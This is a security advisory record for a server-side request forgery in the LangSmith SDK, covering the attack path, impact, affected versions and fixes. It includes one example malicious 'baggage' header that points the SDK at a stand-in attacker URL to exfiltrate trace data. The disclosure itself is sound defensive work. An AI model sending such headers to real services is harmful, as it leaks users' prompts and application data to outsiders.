{"id":"GHSA-v34v-rq6j-cj6p","summary":"LangSmith Client SDK Affected by Server-Side Request Forgery via Tracing Header Injection","details":"## Summary\n\nThe LangSmith SDK's distributed tracing feature is vulnerable to Server-Side Request Forgery via malicious HTTP headers. An attacker can inject arbitrary `api_url` values through the `baggage` header, causing the SDK to exfiltrate sensitive trace data to attacker-controlled endpoints.\n\n---\n\n## Description\n\nWhen using distributed tracing, the SDK parses incoming HTTP headers via `RunTree.from_headers()` in Python or `RunTree.fromHeaders()` in TypeScript. The `baggage` header can contain replica configurations including `api_url` and `api_key` fields.\n\nPrior to the fix, these attacker-controlled values were accepted without validation. When a traced operation completes, the SDK's `post()` and `patch()` methods send run data to all configured replica URLs, including any injected by an attacker.\n\n---\n\n## Attack Vector\n\n1. Attacker sends an HTTP request to a vulnerable service with a malicious `baggage` header:\n   ```\n   baggage: langsmith-replicas=[{\"api_url\":\"https://attacker.com/exfil\",\"project_name\":\"x\"}]\n   ```\n\n2. The service parses the header via `RunTree.from_headers()`, storing the attacker's URL\n\n3. When the traced operation completes, the SDK sends the full run data (including LLM inputs, outputs, and metadata) to `https://attacker.com/exfil`\n\n---\n\n## Impact\n\n- **Data Exfiltration:** Sensitive trace data including LLM prompts, completions, and application metadata sent to attacker-controlled servers\n- **SSRF:** Ability to make the server send requests to arbitrary URLs, potentially targeting internal services\n\n---\n\n## Affected Use Cases\n\nApplications are vulnerable if they:\n- Use `TracingMiddleware` to automatically propagate tracing context\n- Call `RunTree.from_headers()` / `RunTree.fromHeaders()` with untrusted HTTP headers\n\n---\n\n## Remediation\n\nUpdate to the patched versions:\n- **Python:** `pip install langsmith\u003e=0.6.3`\n- **JavaScript:** `npm install langsmith@\u003e=0.4.6`\n\nThe fix filters incoming replica configurations to an allowlist of safe fields, removing `api_url`, `api_key`, and other credential fields.\n\n---\n\n## Workarounds\n\nIf unable to upgrade immediately:\n- Strip or validate the `baggage` header before passing to `from_headers()`\n- Do not use `TracingMiddleware` with untrusted traffic","aliases":["CVE-2026-25528"],"modified":"2026-02-22T23:25:43.783797Z","published":"2026-02-09T20:36:59Z","related":["CGA-3mhf-vgh6-9vg5"],"database_specific":{"github_reviewed_at":"2026-02-09T20:36:59Z","cwe_ids":["CWE-918"],"nvd_published_at":"2026-02-09T21:15:48Z","github_reviewed":true,"severity":"MODERATE"},"references":[{"type":"WEB","url":"https://github.com/langchain-ai/langsmith-sdk/security/advisories/GHSA-v34v-rq6j-cj6p"},{"type":"ADVISORY","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-25528"},{"type":"PACKAGE","url":"https://github.com/langchain-ai/langsmith-sdk"}],"affected":[{"package":{"name":"langsmith","ecosystem":"PyPI","purl":"pkg:pypi/langsmith"},"ranges":[{"type":"ECOSYSTEM","events":[{"introduced":"0.4.10"},{"fixed":"0.6.3"}]}],"versions":["0.4.10","0.4.11","0.4.12","0.4.13","0.4.14","0.4.15","0.4.16","0.4.17","0.4.18","0.4.19","0.4.20","0.4.21","0.4.22","0.4.23","0.4.24","0.4.25","0.4.26","0.4.27","0.4.28","0.4.29","0.4.30","0.4.31","0.4.32","0.4.32rc0","0.4.33","0.4.34","0.4.35","0.4.35rc1","0.4.36","0.4.37","0.4.38","0.4.39","0.4.39rc0","0.4.39rc1","0.4.40","0.4.41","0.4.42","0.4.42rc0","0.4.43","0.4.43rc0","0.4.44","0.4.45","0.4.46","0.4.47","0.4.48","0.4.49","0.4.50","0.4.51","0.4.52","0.4.53","0.4.54","0.4.54rc0","0.4.55","0.4.56","0.4.57","0.4.58","0.4.59","0.4.60","0.5.0","0.5.1","0.5.2","0.6.0","0.6.0rc0","0.6.1","0.6.2"],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/02/GHSA-v34v-rq6j-cj6p/GHSA-v34v-rq6j-cj6p.json"}},{"package":{"name":"langsmith","ecosystem":"npm","purl":"pkg:npm/langsmith"},"ranges":[{"type":"SEMVER","events":[{"introduced":"0.3.41"},{"fixed":"0.4.6"}]}],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/02/GHSA-v34v-rq6j-cj6p/GHSA-v34v-rq6j-cj6p.json"}}],"schema_version":"1.7.3","severity":[{"type":"CVSS_V3","score":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N"}]}